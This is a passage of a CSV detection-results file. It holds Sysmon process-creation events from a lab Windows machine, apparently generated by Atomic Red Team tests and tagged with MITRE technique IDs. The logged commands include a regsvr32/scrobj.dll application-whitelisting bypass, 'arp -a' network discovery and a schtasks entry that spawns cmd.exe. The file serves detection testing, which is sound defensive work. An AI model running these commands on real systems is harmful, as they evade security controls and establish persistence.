+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">regsvr32.exe  /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D976-5D31-0000-001041E83700</Data>
+    <Data Name=""ParentProcessId"">4444</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe  /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:42.841951Z"">
+    </TimeCreated>
+    <EventRecordID>4033</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:42.834</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-001093EA3700</Data>
+    <Data Name=""ProcessId"">2332</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">regsvr32.exe  /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D976-5D31-0000-001041E83700</Data>
+    <Data Name=""ParentProcessId"">4444</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548022.841951,2019-07-19T18:53:42.841951+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:42.815966Z"">
+    </TimeCreated>
+    <EventRecordID>4032</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:42.803</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-001041E83700</Data>
+    <Data Name=""ProcessId"">4444</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548022.841951,2019-07-19T18:53:42.841951+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:42.815966Z"">
+    </TimeCreated>
+    <EventRecordID>4032</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:42.803</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-001041E83700</Data>
+    <Data Name=""ProcessId"">4444</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548022.815966,2019-07-19T18:53:42.815966+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:42.404357Z"">
+    </TimeCreated>
+    <EventRecordID>4031</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:42.384</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-0010D8D53700</Data>
+    <Data Name=""ProcessId"">6312</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548022.301844,2019-07-19T18:53:42.301844+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;arp -a&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:42.276408Z"">
+    </TimeCreated>
+    <EventRecordID>4029</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:42.259</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-0010DBCC3700</Data>
+    <Data Name=""ProcessId"">6292</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;arp -a&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548022.276408,2019-07-19T18:53:42.276408+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:53:42.061925Z"">
+    </TimeCreated>
+    <EventRecordID>4028</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:53:42.051</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-00104AC63700</Data>
+    <Data Name=""ProcessId"">6412</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548266.828722,2019-07-19T18:57:46.828722+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:46.640159Z"">
+    </TimeCreated>
+    <EventRecordID>4088</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:46.531</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-001025AD3E00</Data>
+    <Data Name=""ProcessId"">4552</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1563548266.608481,2019-07-19T18:57:46.608481+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS  /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:46.459733Z"">
+    </TimeCreated>
+    <EventRecordID>4086</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">Persistence - Scheduled Task Management</Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:46.443</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-0010C4A83E00</Data>
+    <Data Name=""ProcessId"">1408</Data>
+    <Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Task Scheduler Configuration Tool</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">SCHTASKS  /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DA6A-5D31-0000-001072A63E00</Data>
+    <Data Name=""ParentProcessId"">4276</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548266.459733,2019-07-19T18:57:46.459733+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:46.422427Z"">
+    </TimeCreated>
+    <EventRecordID>4085</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:46.411</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-001072A63E00</Data>
+    <Data Name=""ProcessId"">4276</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548266.422427,2019-07-19T18:57:46.422427+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:46.207200Z"">
+    </TimeCreated>
+    <EventRecordID>4084</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
